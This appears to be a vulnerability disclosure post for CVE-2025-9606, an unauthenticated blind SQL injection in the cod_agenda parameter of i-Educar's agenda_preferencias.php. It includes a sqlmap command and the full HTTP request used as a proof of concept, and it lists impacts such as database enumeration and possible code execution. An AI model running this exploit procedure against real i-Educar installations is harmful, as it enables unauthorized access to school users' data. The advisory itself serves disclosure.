Featured image of post CVE-2025-9606
SQL Injection Critical I-Educar Security WebApp

CVE-2025-9606

SQL Injection

CVE-2025-9606: SQL Injection (Blind Time-Based) Vulnerability in cod_agenda Parameter on agenda_preferencias.php Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-9606

Summary

A SQL Injection vulnerability was discovered in the cod_agenda parameter of the agenda_preferencias.php endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.

Details

The application fails to properly sanitize user-supplied input in the cod_agenda parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.

PoC

Vulnerable Endpoint: agenda_preferencias.php

Parameter: cod_agenda

Command:

1

sqlmap -r req.txt --risk=3 --level=5 --dbs --dbms=PostgreSQL --batch

Example Request

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

POST /intranet/agenda_preferencias.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/intranet/agenda_preferencias.php
Cookie: [COOKIE]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

tipoacao=Editar&cod_agenda=2&envia_alerta=0&agenda_display=2

Impact

  • Unauthorized access to sensitive data (e.g., users, passwords, logs).
  • Database enumeration (schemas, tables, users, versions).
  • Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).
  • Full compromise of the application if chained with other vulnerabilities.
  • This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.

Reference

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9606.md

Finder

Marcelo Queiroz

By: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy